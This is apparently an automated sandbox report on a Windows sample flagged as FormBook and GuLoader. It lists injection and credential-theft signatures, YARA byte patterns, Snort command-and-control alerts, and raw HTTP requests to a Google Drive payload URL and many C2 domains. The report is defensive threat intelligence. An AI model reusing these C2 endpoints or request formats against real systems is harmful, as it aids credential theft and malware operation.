Windows Analysis Report
Antndte.exe

Overview

General Information

Sample name: Antndte.exe
Analysis ID: 1353242
MD5: b56bb86c217f7a77d3f862acf4ecdbe6
SHA1: 665a33c13323e71fd440bb685f417cc279190b37
SHA256: 13a9d7b568ad553f15ab6174f7381c07e1f4d93616d9be70e1b6c3c7c0de69f4

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • Antndte.exe (PID: 8040 cmdline: C:\Users\user\Desktop\Antndte.exe MD5: B56BB86C217F7A77D3F862ACF4ECDBE6)
    • Antndte.exe (PID: 2384 cmdline: C:\Users\user\Desktop\Antndte.exe MD5: B56BB86C217F7A77D3F862ACF4ECDBE6)
      • czazZqNSMxullu.exe (PID: 2852 cmdline: "C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rundll32.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • czazZqNSMxullu.exe (PID: 8076 cmdline: "C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6064 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x278a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security

Source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp
Rule: Windows_Trojan_Formbook_1112e116
Description: unknown
Author: unknown
Strings:
  • 0x278a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp
Rule: JoeSecurity_FormBook_1
Description: Yara detected FormBook
Author: Joe Security
        No Sigma rule has matched

        AV Detection

        Source: http://www.vaultedjewelry.com/3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38 Avira URL Cloud: Label: malware
        Source: http://www.neuvillette.org/3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38 Avira URL Cloud: Label: malware
        Source: http://www.littlehappiez.com/3hr5/ Avira URL Cloud: Label: malware
        Source: http://www.echolinkevolve.xyz/3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 Avira URL Cloud: Label: malware
        Source: http://www.brls.money/3hr5/ Avira URL Cloud: Label: malware
        Source: http://www.littlehappiez.com/3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1 Avira URL Cloud: Label: malware
        Source: http://www.echolinkevolve.xyz/3hr5/ Avira URL Cloud: Label: malware
        Source: http://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38 Avira URL Cloud: Label: malware
        Source: http://www.neuvillette.org/3hr5/ Avira URL Cloud: Label: malware
        Source: http://www.vaultedjewelry.com/3hr5/ Avira URL Cloud: Label: malware
        Source: Antndte.exe ReversingLabs: Detection: 16%
        Source: Yara match File source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Antndte.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:50129 version: TLS 1.2
        Source: unknown HTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:50130 version: TLS 1.2
        Source: Antndte.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: czazZqNSMxullu.exe, 00000004.00000002.14741699612.0000000000CAE000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: wntdll.pdbUGP source: Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Antndte.exe, Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\Antndte.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990

        Networking

        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50132 -> 74.208.236.243:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50133 -> 74.208.236.243:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50136 -> 216.40.34.41:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50137 -> 216.40.34.41:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50140 -> 37.97.254.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50141 -> 37.97.254.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50144 -> 108.179.192.34:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50145 -> 108.179.192.34:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50148 -> 198.177.123.106:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50149 -> 198.177.123.106:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50152 -> 198.252.98.64:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50153 -> 198.252.98.64:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50156 -> 91.195.240.117:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50157 -> 91.195.240.117:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50160 -> 104.232.106.165:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50161 -> 104.232.106.165:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50164 -> 89.31.143.90:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50165 -> 89.31.143.90:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50168 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50169 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50172 -> 172.67.202.151:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50173 -> 172.67.202.151:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50176 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50177 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50180 -> 76.76.21.142:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50181 -> 76.76.21.142:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50185 -> 74.208.236.243:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50186 -> 74.208.236.243:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50138 -> 216.40.34.41:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50189 -> 216.40.34.41:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50190 -> 216.40.34.41:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50191 -> 216.40.34.41:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50193 -> 37.97.254.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50194 -> 37.97.254.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50195 -> 37.97.254.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50197 -> 108.179.192.34:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50198 -> 108.179.192.34:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50201 -> 198.177.123.106:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50202 -> 198.177.123.106:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50205 -> 198.252.98.64:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50206 -> 198.252.98.64:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50162 -> 104.232.106.165:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50209 -> 91.195.240.117:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50210 -> 91.195.240.117:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50213 -> 217.160.0.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50214 -> 217.160.0.27:80
        Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50216 -> 217.160.0.27:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50217 -> 23.227.38.74:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50218 -> 23.227.38.74:80
        Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50220 -> 23.227.38.74:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50221 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50222 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50224 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50225 -> 91.184.0.200:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50226 -> 91.184.0.200:80
        Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50228 -> 91.184.0.200:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50229 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50230 -> 91.195.240.19:80
        Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50233 -> 89.117.169.140:80
        Source: DNS query: www.echolinkevolve.xyz
        Source: Joe Sandbox View IP Address: 217.160.0.27
        Source: Joe Sandbox View IP Address: 37.97.254.27
        Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
        Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE
        Source: Joe Sandbox View ASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL
        Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1YEiS4USubspx63PCPnPvhVVNsu4h-RY3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/067j0cfqh00llp67j6c8t9vjf51stn5l/1701699675000/13539573903470379141/*/1YEiS4USubspx63PCPnPvhVVNsu4h-RY3?e=download&uuid=93397b9d-12f9-4f2d-8d03-b765824cb4a8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Cache-Control: no-cacheHost: doc-0c-0k-docs.googleusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1Host: www.hormigonesmil.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=C7q+sjkOjeHdW4KfX5XkOV+bb3qVpxl3Mz3wz487ZoyHEt9a0wBYazkTJk6RHURF+VscnNPsgG//B6D/+agfmiMJ8iKN4XKnaw==&1dr=yP5PQD38 HTTP/1.1Host: www.homesteadmath.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=lEWuOoHaKeBJFGUazSVmb1afSNtW7c4aGAz9OG4Rjri38H/1L2LaU9Tlv3NTxVqSbHzxo0vPiJpjlRXDX4jfk8ag1kGN3tAtrg==&1dr=yP5PQD38 HTTP/1.1Host: www.ritualyoga.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=WvKXMpNdKcx12PohJdQ2Nu7zrY//6AeCNDisJJSnngoH0SI3JFeqPH7/T9Xi9rN0AVbH68W87D80yQtOqBVkzxSvcNI04lJ+LQ==&1dr=yP5PQD38 HTTP/1.1Host: www.rocsys.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=JbHlBWUudHwvZJwvAXOZDEBKgaTZSnA3HzZDUQLF8+dObUm02fdCsm6RYH22N3XnV4/Dw1x9sJd7kAxoLurayq/ALLHEWghrDA==&1dr=yP5PQD38 HTTP/1.1Host: www.metodomestredojogo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38 HTTP/1.1Host: www.echolinkevolve.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=1GBeYqUlvH78co4+g8Q+CfM+UtjAe3WyllxzQQGSa+KkDcyrOKO1xWP996LaB7yKSXvDg0vLLxD85Rjujtt4A1/HBs9QKRta2A==&1dr=yP5PQD38 HTTP/1.1Host: www.rtptornado4dnihboss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38 HTTP/1.1Host: www.slimnthinau.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=SKyXXko5z7q9YQjFZFQloZKIT7V5SVEae/5q6Ytdmten2hC5b6JJ08XTyYu5k0EUJUGdyr8TcNcxF84C+h+0NQx0rsHsMlG9kw==&1dr=yP5PQD38 HTTP/1.1Host: www.080869.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD38 HTTP/1.1Host: www.eigenheimstattmiete.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38 HTTP/1.1Host: www.neuvillette.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=Ap4TCNxJOGTwjJSJsQdbrLTufwm/fHI6SBhQgXxPQrxr/rPwO1BNXP+VLlfTCp45O178MqQRyNXbll1g47V3CH2eQGoyL5qC3A==&1dr=yP5PQD38 HTTP/1.1Host: www.scoopstarz.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38 HTTP/1.1Host: www.vaultedjewelry.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38 HTTP/1.1Host: www.brls.moneyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
        Source: global trafficHTTP traffic detected: GET /3hr5/?TZd=c86HwL6awPzuMGf5odR8ge26ZJuW2ve/yLw5siKGJriA7+WnzKeTjM+vElG16hohQNIzfICPIQpWrOzE9UWowUmJc+Cd2Q+HJw==&gpo=NNNtyBQpfR9tJN1 HTTP/1.1Host: www.austintrafficlawyer.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
